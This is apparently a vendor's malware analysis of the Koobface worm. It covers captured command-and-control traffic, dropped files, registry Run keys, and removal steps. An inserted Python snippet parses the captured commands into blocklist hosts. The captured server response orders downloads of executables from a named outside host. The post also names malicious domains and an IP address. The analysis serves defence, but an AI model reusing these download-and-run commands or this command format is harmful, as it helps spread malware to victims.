Worm.Win32.Koobface

A user sent us another fake video codec downloaded from a fake movie website, which used fake Flash movies to push the user into downloading the codec.

Once the program is executed, it generates the following Internet traffic:

POST /achcheck.php HTTP/1.1
Host: nua06032009.biz
 
POST /ld/gen.php HTTP/1.1
Host: nua06032009.biz
#PID=8000
STARTONCE|hxxp://stanishev.com/1/pch4.exe
START|hxxp://stanishev.com/1/nfr.exe
STARTONCE|hxxp://stanishev.com/1/pp.06.exe
WAIT|120
#BLACKLABEL
EXIT

In the traffic above the malware is trying to download and install three different new malware samples on the victim's computer. The following files are created in the system after the three URLs are downloaded:

C:\WINDOWS\ld08.exe
C:\353454543.bat
%User%\LOCALS~1\Temp\jopaxx_xx40040395.exe
C:\WINDOWS\st_xx40038948.exe
C:\dll32.bat
%User%\LOCALS~1\Temp\jopaxx_1240028657.exe
C:\WINDOWS\system32\dll32.exe 
C:\WINDOWS\9g2234wesdf3dfgjf23 
C:\WINDOWS\pp06.exe
C:\355674543.bat
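The gen.php response captured above is a plain line-oriented command script, so a responder can parse it directly to pull out the URLs and hosts to block and the beacon interval to alert on. This is an added example, not code from the original post; the meaning of the verbs (START/STARTONCE fetch and run a file, WAIT sleeps for the given number of seconds) is an assumption inferred from what the page describes, and the sample input is the page's own captured response with its hxxp defanging kept.

```python
from __future__ import annotations
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample: the gen.php response body shown on this page,
# with the URLs kept defanged (hxxp) exactly as the page prints them.
SAMPLE_RESPONSE = """#PID=8000
STARTONCE|hxxp://stanishev.com/1/pch4.exe
START|hxxp://stanishev.com/1/nfr.exe
STARTONCE|hxxp://stanishev.com/1/pp.06.exe
WAIT|120
#BLACKLABEL
EXIT
"""

# Assumed meaning (inferred from the page): these verbs carry a URL the
# bot downloads and executes.
DOWNLOAD_VERBS = {"START", "STARTONCE"}

@dataclass(frozen=True)
class Directive:
    verb: str
    arg: str  # empty when the verb takes no argument, e.g. EXIT

def parse_gen_script(body: str) -> tuple[dict[str, str], list[Directive]]:
    """Split the script into '#KEY=VALUE' / '#FLAG' metadata and 'VERB|ARG'
    directives. Unknown verbs are kept as-is so nothing the controller sent
    is silently dropped from the analyst's view."""
    meta: dict[str, str] = {}
    directives: list[Directive] = []
    for raw in body.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            key, _, value = line[1:].partition("=")
            meta[key] = value  # a bare flag such as BLACKLABEL maps to ""
            continue
        verb, _, arg = line.partition("|")
        directives.append(Directive(verb.upper(), arg.strip()))
    return meta, directives

def download_urls(directives: list[Directive]) -> list[str]:
    """Every URL the script would make the bot fetch, in script order."""
    return [d.arg for d in directives if d.verb in DOWNLOAD_VERBS and d.arg]

def block_hosts(directives: list[Directive]) -> set[str]:
    """Hostnames for a DNS/proxy blocklist; undoes hxxp:// defanging first."""
    hosts = set()
    for url in download_urls(directives):
        if url.lower().startswith("hxxp"):
            url = "http" + url[4:]
        if (host := urlsplit(url).hostname):
            hosts.add(host)
    return hosts

def wait_seconds(directives: list[Directive]) -> int:
    """Total sleep requested by WAIT lines; handy for beacon-interval alerts."""
    return sum(int(d.arg) for d in directives if d.verb == "WAIT" and d.arg.isdigit())
```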

Note that a new .bat file was dropped in C:\ and then executed by the malware, and the following files were deleted:

%User%\LOCALS~1\Temp\JOPAXX~2.EXE
C:\355674~1.BAT
C:\WINDOWS\ST_124~1.EXE
C:\dll32.bat

Running processes:

Screenshot of running processes

The program generates the following Internet traffic:

GET /v50/search.php?p=10005&s=I&v=57&uid=-XXXXXXXXX&q= HTTP/1.1
User-Agent: 
Host: 85.13.236.154
Referer:

Symptoms that can be noticed in a HijackThis log:

c:\windows\ld08.exe
%User%\LOCALS~1\Temp\jopaxx_1240040395.exe
c:\windows\pp06.exe
C:\WINDOWS\System32\dll32.exe
 
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=localhost:7171
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local;<local>
O4 - HKLM\..\Run: [sysldtray] c:\windows\ld08.exe
O4 - HKLM\..\Run: [pp] c:\windows\pp06.exe
O4 - HKCU\..\Run: [dll32] dll32

How to remove this malware?

1) Kill all the malicious running processes and remove their files, in my case:

ld08.exe
pp06.exe
dll32.exe
jopaxx_1240040395.exe

2) Delete malicious registry keys, in my case:

O4 - HKLM\..\Run: [sysldtray] c:\windows\ld08.exe
O4 - HKLM\..\Run: [pp] c:\windows\pp06.exe
O4 - HKCU\..\Run: [dll32] dll32

3) Block malicious IPs and domains, in my case:

nua06032009.biz
stanishev.com
85.13.236.154 (85.13.236.154.reverse.coreix.net)

4) Update your antivirus and do a full system scan

5) Scan your system with NoVirusThanks Malware Remover
